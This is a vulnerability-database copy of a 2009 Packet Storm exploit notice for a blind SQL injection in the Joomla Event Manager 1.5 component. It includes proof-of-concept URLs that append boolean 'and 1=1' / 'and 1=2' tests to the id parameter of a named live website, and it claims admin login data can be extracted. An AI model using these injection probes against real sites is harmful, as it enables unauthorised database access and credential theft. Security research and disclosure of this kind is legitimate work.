Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormFl0riXPACKETSTORM:84074
HistoryDec 18, 2009 - 12:00 a.m.

Joomla Event Manager Blind SQL Injection

2009-12-1800:00:00
Fl0riX
packetstormsecurity.com
15
JSON
`  
<------------------- header data start ------------------- >  
  
#####################################################################  
#Joomla Component Event Manager Blind SQL Injection Vulnerability #   
#####################################################################  
  
  
# author : Fl0riX  
  
# Script Name : Joomla Component Event Manager 1.5  
  
# Bug Type : Blind SQL Injection  
  
# Infection : Admin login bilgileri alýnabilir.  
  
# Demo Vuln. :  
(+)  
» http://joomla-india.org/eventmanager/index.php?option=com_content&view=article&id=44 and 1=2  
(+)  
» http://joomla-india.org/eventmanager/index.php?option=com_content&view=article&id=44 and 1=1  
  
# Bug Fix Advice : Zararlý karakterler filtrelenmelidir.  
  
#############################################################  
  
< ------------------- header data end of ------------------- >  
  
< -- bug code start -- >  
  
path/index.php?option=com_content&view=article&id=[Blind]  
  
< -- bug code end of -- >  
  
  
_________________________________________________________________  
Windows Live Hotmail: Arkadaþlarýnýz Facebook'taki güncellemelerinizi doðrudan Hotmail®'den alýr.  
http://www.microsoft.com/windows/windowslive/see-it-in-action/social-network-basics.aspx?ocid=PID23461::T:WLMTAGL:ON:WL:tr-tr:SI_SB_4:092009`
JSON